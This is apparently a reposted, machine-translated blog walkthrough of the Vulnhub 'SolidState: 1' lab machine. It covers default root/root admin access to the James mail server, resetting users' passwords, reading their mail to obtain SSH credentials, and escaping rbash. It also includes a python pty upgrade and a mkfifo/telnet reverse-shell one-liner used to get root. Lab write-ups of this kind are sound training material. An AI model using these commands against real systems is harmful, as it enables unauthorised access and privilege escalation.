当前位置：网站首页>Vulnhub solidstate: 1 target penetration test

Vulnhub solidstate: 1 target penetration test

2022-07-24 05:38:00 【Outstanding, outstanding】

One 、ip Probe
Two 、 Port detection
Found frequent occurrence of james, also 4555 Port is still running james-admin
3、 ... and 、 Port information collection
Check the script , Discover the use of root/root Connect 4555 port
Four 、 Port information utilization
4.1 nc Connect 4555 port （root/root）
found 5 Users , And will 5 User passwords are reset to 123
4.2 Log in to the account in turn , Check email （POP3）
Use telnet After logging in to the email , Find out john There is a letter about mindy The mail
Sign in mindy Check the email content in your account , Find out ssh User name and password
4.3 Sign in ssh
After logging in, I found it was a restricted rbash, Many commands cannot be executed
4.4 rbash Bypass
stay ssh Try to bypass when logging in
4.5 Upgrade terminal
Terminal optimization

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo;fg
export TERM=xterm
reset

4.6 View other user processes
adopt /etc/passwd Knowledge still exists james user , View the user process , Get into /opt Catalog , found root File of account Authority
4.7 Write bounce shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 172.16.9.9 3333 > /tmp/f

4.8 Turn on local monitoring
Received a rebound shell by root jurisdiction , The right raising is completed .

版权声明
本文为[Outstanding, outstanding]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/205/202207240516157432.html